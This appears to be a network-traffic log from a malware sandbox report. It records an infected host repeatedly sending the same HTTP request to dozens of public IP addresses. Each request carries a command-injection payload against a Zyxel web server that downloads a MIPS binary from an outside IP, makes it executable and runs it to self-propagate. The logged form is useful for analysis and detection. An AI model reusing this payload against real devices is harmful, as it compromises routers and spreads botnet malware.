                                            Jan 14, 2024 15:50:24.173721075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            363192.168.2.235397424.141.95.249443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173748970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            364192.168.2.234349646.240.155.124443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173748970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            365192.168.2.235405619.60.40.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173767090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            366192.168.2.235674473.120.172.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173798084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            367192.168.2.2339184133.56.118.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173827887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            368192.168.2.235505467.41.214.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173827887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            369192.168.2.2350264152.176.231.145443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173850060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            370192.168.2.2334114191.201.50.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173871994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            371192.168.2.2347324156.201.204.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173881054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            372192.168.2.235188098.54.18.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173897028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            373192.168.2.234728844.217.55.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173927069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            374192.168.2.236040841.194.96.234443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173966885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            375192.168.2.2353914209.166.234.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173978090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            376192.168.2.235948438.7.238.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.174000978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            377192.168.2.2347232102.231.18.115443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.174026012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            378192.168.2.23391681.166.231.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.174052000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            379192.168.2.2340828105.201.74.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.174099922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            380192.168.2.2356952179.48.138.103443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.174110889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            381192.168.2.2336762210.40.54.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.174129963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            382192.168.2.2355854221.207.83.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.174144030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            383192.168.2.2349700154.33.43.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.174144030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            384192.168.2.235814846.211.228.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.174173117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            385192.168.2.2344350219.221.1.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.174190998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            386192.168.2.234359248.221.21.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.174221039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            387192.168.2.235821639.112.148.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.174232006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            388192.168.2.234945444.192.232.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.174293995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            389192.168.2.2353246121.144.128.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.174299955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            390192.168.2.2341176145.17.47.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.174355984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            391192.168.2.235362860.199.227.0443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.174387932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            392192.168.2.2359266160.226.140.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.174406052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            393192.168.2.2336362206.96.118.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.174407959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            394192.168.2.2355558164.152.72.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.174415112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            395192.168.2.2344940203.12.229.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.174415112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            396192.168.2.234703482.119.7.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.174415112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            397192.168.2.2348136158.129.114.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.174415112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            398192.168.2.235426431.115.79.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.174464941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            399192.168.2.2333918130.104.203.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.174480915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            400192.168.2.2351750110.78.143.208443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.175007105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            401192.168.2.2348808209.205.194.250443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.175081968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            402192.168.2.2355764122.234.104.212443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.175084114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            403192.168.2.2346700190.78.244.59443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.181607008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            404192.168.2.234872870.118.242.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.181632996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            405192.168.2.2336614107.82.76.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.181654930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            406192.168.2.234662448.184.16.63443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.181696892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            407192.168.2.2341612176.51.88.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.181731939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            408192.168.2.2339330199.190.99.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.181745052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            409192.168.2.2335014159.233.166.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.181777954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            410192.168.2.234935893.148.55.113443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.181801081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            411192.168.2.2348172125.93.90.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.181839943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            412192.168.2.233604278.163.206.155443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.181879997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            413192.168.2.2347902139.220.44.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.181893110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            414192.168.2.234567653.244.16.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.181920052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            415192.168.2.234718453.79.175.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.181958914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            416192.168.2.233567088.81.180.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.181979895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            417192.168.2.2335564133.21.92.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.182018042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            418192.168.2.2333268170.191.62.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.182035923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            419192.168.2.234004070.98.31.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.182069063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            420192.168.2.2355262195.45.99.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.182109118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            421192.168.2.235337473.193.125.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.182147980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            422192.168.2.2348674196.152.251.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.182179928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            423192.168.2.235724888.31.82.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.182226896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            424192.168.2.234099462.86.10.186443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.182267904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            425192.168.2.2352034183.122.98.237443
                                            TimestampBytes transferredDirectionData
